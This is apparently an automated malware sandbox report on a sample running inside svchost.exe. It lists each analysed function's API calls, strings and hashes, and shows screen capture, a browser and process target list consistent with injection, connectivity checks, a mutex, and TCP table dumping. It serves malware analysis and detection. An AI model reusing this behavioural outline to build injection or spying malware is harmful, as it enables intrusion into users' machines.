                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$CreateProcess$CloseInformationThreadVirtual$AddressAllocMemoryModuleProcSnapshotToolhelp32Write$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                                    • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 2650560580-3024904723
                                                                                                                                                                                                                    • Opcode ID: 16b50e25f9ab040db3dfa2b1bbdb07aab0756fc76a2135fbef614e906c7b86e1
                                                                                                                                                                                                                    • Instruction ID: 1a168fb6bc5f68d4b946373794debbb1d69b3a86ee86773ba1e2fdee5f1489b9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16b50e25f9ab040db3dfa2b1bbdb07aab0756fc76a2135fbef614e906c7b86e1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92619571A40284BBEF12DF64CC89FAA77ACEF85B04F158599FD059B280DB74DA41CB60
                                                                                                                                                                                                                    Function 02C93950 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 181COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 02C9395E
                                                                                                                                                                                                                    • GetWindowDC.USER32(00000000), ref: 02C93965
                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 02C9397A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$CompatibleCreateDesktop
                                                                                                                                                                                                                    • String ID: ($BM
                                                                                                                                                                                                                    • API String ID: 3720047489-2980357723
                                                                                                                                                                                                                    • Opcode ID: 877537c5a62760423418052294a140d0a62b69241ec763b07aa43e08c1110234
                                                                                                                                                                                                                    • Instruction ID: 66da597546c0650b0bfef3b024a0a811454a89ce9df7fc2a3b6aa3b1ec11ce2a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 877537c5a62760423418052294a140d0a62b69241ec763b07aa43e08c1110234
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D516271E40258BBDB11DFA4EC48BAEBBB9FF88711F104659F904E7280DB709D118BA5
                                                                                                                                                                                                                    Function 02C83D90 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 87networkstringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                                    • DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                                    • StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                                    • StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CheckConnectionInternetlstrcpynmemset$AdminAliveCacheFlushNetworkResolverUser
                                                                                                                                                                                                                    • String ID: http://$www.bing.com$www.microsoft.com
                                                                                                                                                                                                                    • API String ID: 1656757314-3977723178
                                                                                                                                                                                                                    • Opcode ID: 046cff174cf00cf9745e4414d1a13b771669121d0302758fc0263850c3479c27
                                                                                                                                                                                                                    • Instruction ID: d45695dd1716ebac61938a8b3cd0950e38a12e6e9132130ccafc4e5caf358cfc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 046cff174cf00cf9745e4414d1a13b771669121d0302758fc0263850c3479c27
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8121CD73E8425867E721E7A49C41FDAB76CDF94B14F0045D5FA88E7080DAF19AC48B91
                                                                                                                                                                                                                    Function 02C77020 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 76sleepsynchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02C77041
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C77052
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02C77060
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C77069
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C7707F
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C77091
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C770B9
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02C770D2
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 02C770DD
                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000), ref: 02C770E9
                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 02C770F4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Mutex$HandleOpenSleep$CloseEventExitFileInformationModuleNameProcessRelease
                                                                                                                                                                                                                    • String ID: Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}$P0#v$\explorer.exe
                                                                                                                                                                                                                    • API String ID: 2248524772-2059955476
                                                                                                                                                                                                                    • Opcode ID: baeaa3e8bd56cf9e915a1522bfc4e803d915b3a43fc1007f0841b28de74fd959
                                                                                                                                                                                                                    • Instruction ID: 89f55bf59260a55909fb45ec8e651e1948a1b63d5d2c83ccde98a960c91ce188
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: baeaa3e8bd56cf9e915a1522bfc4e803d915b3a43fc1007f0841b28de74fd959
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39210831E847446BE322BB759C09F6AFB9CAFC0B10F004655F95493181DBB4D9188AE2
                                                                                                                                                                                                                    Function 02C72BB0 Relevance: 21.5, APIs: 14, Instructions: 466COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: callocfree$exit
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 337157181-0
                                                                                                                                                                                                                    • Opcode ID: 7f48ad7fa4da548279fe1b0c99727c96497688232c9c7f067b880dbf04229b04
                                                                                                                                                                                                                    • Instruction ID: 67329b314172805e52ad59086c6dbb5ba13a56f959d6b419cfae029237b9aa8e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f48ad7fa4da548279fe1b0c99727c96497688232c9c7f067b880dbf04229b04
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDF1CF71A0065A9FDB20CF98D884BAEB7B5FF88314F144169ED05A7340D771EE51CBA2
                                                                                                                                                                                                                    Function 02C86370 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88memoryprocessCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02C86384
                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,?), ref: 02C863A9
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000), ref: 02C863CD
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|,?,?,00000000), ref: 02C863E7
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C8640B
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02C86411
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C86418
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C86446
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: OpenProcess.KERNEL32(00000400,00000000,00000000,7622F550,00000000,7736C3F0), ref: 02C92E15
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: OpenProcessToken.ADVAPI32(00000000,00000010,?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E2C
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02C92E4A
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E62
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C92EBB
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: CloseHandle.KERNEL32(?), ref: 02C92ECC
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(00000000,?), ref: 02C92EDE
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: CloseHandle.KERNEL32(00000000), ref: 02C92EEF
                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 02C8645A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02C86474
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02C86485
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|, xrefs: 02C863E2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$InformationProcess$Close$CriticalHeapOpenProcess32SectionToken$AllocCharCreateCurrentEnterFirstLeaveNextSnapshotToolhelp32Upper
                                                                                                                                                                                                                    • String ID: iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|
                                                                                                                                                                                                                    • API String ID: 3461290786-860058239
                                                                                                                                                                                                                    • Opcode ID: 309971bf6f53314554b47302d7e277ad4b9c34fe133696fd324226235836fcf3
                                                                                                                                                                                                                    • Instruction ID: 1acad026bad8bc81f15bff71473b071b2aa7c70764d43b849abcc9449434b30f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 309971bf6f53314554b47302d7e277ad4b9c34fe133696fd324226235836fcf3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC319470D41254EFDB21DF65D849B9EB7BCFF88718F1085A9E849D3240D7309A45CB61
                                                                                                                                                                                                                    Function 02C76A30 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 91threadstringnativeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 02C76A4C
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 02C76A5F
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: OpenProcess.KERNEL32(00000400,00000000,00000000,7622F550,00000000,7736C3F0), ref: 02C92E15
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: OpenProcessToken.ADVAPI32(00000000,00000010,?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E2C
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02C92E4A
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E62
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C92EBB
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: CloseHandle.KERNEL32(?), ref: 02C92ECC
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(00000000,?), ref: 02C92EDE
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: CloseHandle.KERNEL32(00000000), ref: 02C92EEF
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C76A6E
                                                                                                                                                                                                                    • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C76A87
                                                                                                                                                                                                                    • GetUserObjectInformationA.USER32(00000000), ref: 02C76A8E
                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,80f507eba), ref: 02C76AA4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76AE9
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C76B03
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 02C76B16
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Information$Handle$OpenProcess$CloseCurrentThreadToken$CharDesktopMutexObjectQuerySystemUpperUser_snprintflstrcmpimemset
                                                                                                                                                                                                                    • String ID: 80f507eba$Global\HighMemoryEvent_%08x
                                                                                                                                                                                                                    • API String ID: 1400009243-1487560610
                                                                                                                                                                                                                    • Opcode ID: c8ce148320c71e6f7165467db7b5d437f6a75079891ace40bf26555325746e95
                                                                                                                                                                                                                    • Instruction ID: cab2f2639501efa66fa813353dfb62881e3343080eb70cdf95d92355d2c32780
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8ce148320c71e6f7165467db7b5d437f6a75079891ace40bf26555325746e95
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A31F272A40255ABDB21CF61CC88BAAB77CFF94B10F144655FE4497280E7B0AD91CFA1
                                                                                                                                                                                                                    Function 029A1360 Relevance: 3.2, APIs: 2, Instructions: 241memorylibraryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,61FF864A), ref: 029A1451
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,0AFB4677), ref: 029A1515
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3416553301.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_29a0000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocLibraryLoadVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3550616410-0
                                                                                                                                                                                                                    • Opcode ID: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
                                                                                                                                                                                                                    • Instruction ID: bb8178fee0d07ba4466ffa7705655954c1ec0c1b777c56eb866e195d8b30916b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB914BB5D00719AFCB24DFE8C860BAEB7BAAF88354F154559E809B7344D734AA01CF94
                                                                                                                                                                                                                    Function 02C740F0 Relevance: 86.0, APIs: 35, Strings: 14, Instructions: 267memorynetworkfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 326 2c740f0-2c7411a GetProcessHeap HeapAlloc 327 2c7412c-2c74187 326->327 328 2c7411c-2c74129 memset 326->328 329 2c743c4-2c743ca 327->329 330 2c7418d-2c7419d GetTcpTable 327->330 328->327 331 2c74200-2c74202 330->331 332 2c7419f-2c741ad GetProcessHeap HeapValidate 330->332 335 2c74204-2c74212 GetProcessHeap HeapValidate 331->335 336 2c7422d-2c7423a 331->336 333 2c741af-2c741b5 GetProcessHeap HeapFree 332->333 334 2c741bb-2c741c2 332->334 333->334 337 2c741c4-2c741da GetProcessHeap HeapAlloc 334->337 338 2c741e8-2c741ed 334->338 335->329 339 2c74218-2c7422a GetProcessHeap HeapFree 335->339 340 2c743d0-2c743dd call 2c82d20 336->340 341 2c74240-2c74259 GetProcessHeap HeapAlloc 336->341 337->338 342 2c741dc-2c741e5 memset 337->342 338->329 343 2c741f3-2c741fa GetTcpTable 338->343 345 2c7425f-2c74272 memset 341->345 346 2c743cd 341->346 342->338 343->331 348 2c74274-2c7427c 345->348 346->340 348->348 349 2c7427e-2c7428b 348->349 350 2c74363 349->350 351 2c74291 349->351 352 2c74366-2c7436c 350->352 353 2c74294-2c742a1 call 2c74000 351->353 352->352 354 2c7436e-2c74383 352->354 359 2c742a7-2c742b4 call 2c74000 353->359 360 2c7434b-2c7435a 353->360 356 2c74386-2c7438b 354->356 356->356 358 2c7438d-2c743b6 WriteFile GetProcessHeap HeapValidate 356->358 358->329 361 2c743b8-2c743be GetProcessHeap HeapFree 358->361 365 2c742b6-2c742bc 359->365 366 2c7432f-2c7433d GetProcessHeap HeapValidate 359->366 360->353 363 2c74360 360->363 361->329 363->350 367 2c742c0-2c742c5 365->367 366->360 368 2c7433f-2c74345 GetProcessHeap HeapFree 366->368 367->367 369 2c742c7-2c7431e htons * 2 _snprintf GetProcessHeap HeapValidate 367->369 368->360 370 2c74320-2c74326 GetProcessHeap HeapFree 369->370 371 2c7432c 369->371 370->371 371->366
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000C10,00000000,762335B0,00000000), ref: 02C7410D
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C74110
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C74124
                                                                                                                                                                                                                    • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C74194
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C741A2
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C741A5
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C741B2
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C741B5
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000C13), ref: 02C741CD
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C741D0
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C741E0
                                                                                                                                                                                                                    • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C741FA
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74207
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7420A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7421B
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7421E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000083), ref: 02C74249
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C7424C
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C74263
                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 02C742D9
                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 02C742EC
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C74307
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74313
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C74316
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74323
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C74326
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 02C74332
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C74335
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74342
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C74345
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000C00,00000000,00000001,?,00000000), ref: 02C743A2
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C743AB
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C743AE
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C743BB
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C743BE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$FreeValidate$Allocmemset$Tablehtons$FileWrite_snprintf
                                                                                                                                                                                                                    • String ID: CLOSED$CLOSE_WAIT$CLOSING$DELETE_TCB$ESTAB$FIN_WAIT1$FIN_WAIT2$LAST_ACK$LISTEN$SYN_RCVD$SYN_SENT$TCP%s:%d%s:%d%s$TIME_WAIT$netstat{ProtoLocal addressRemote addressState
                                                                                                                                                                                                                    • API String ID: 3573621883-2402783461
                                                                                                                                                                                                                    • Opcode ID: cdf18205eaf4d770cafe0dd934a66c4fea390b45350f0fdebda89808dd7fe703
                                                                                                                                                                                                                    • Instruction ID: 6fd2147aa34d27987b0607b3265e8337516b80a64b11be02324dc0ca9855ac84
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdf18205eaf4d770cafe0dd934a66c4fea390b45350f0fdebda89808dd7fe703
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D91C7B1E40289ABDB259FA5EC88FAF7F78EF85705F144594E508E7281DB30D504CB61
                                                                                                                                                                                                                    Function 02C83620 Relevance: 72.1, APIs: 33, Strings: 8, Instructions: 311memorynetworkfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
